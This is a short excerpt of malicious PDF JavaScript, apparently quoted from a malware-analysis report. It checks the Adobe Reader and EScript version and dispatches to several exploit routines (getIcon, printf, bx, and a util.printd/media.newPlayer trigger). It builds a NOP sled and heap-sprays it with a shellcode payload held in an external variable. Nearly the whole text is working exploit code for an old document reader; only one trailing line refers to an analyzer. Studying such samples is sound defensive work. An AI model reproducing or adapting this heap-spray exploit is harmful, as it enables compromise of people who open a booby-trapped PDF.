if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.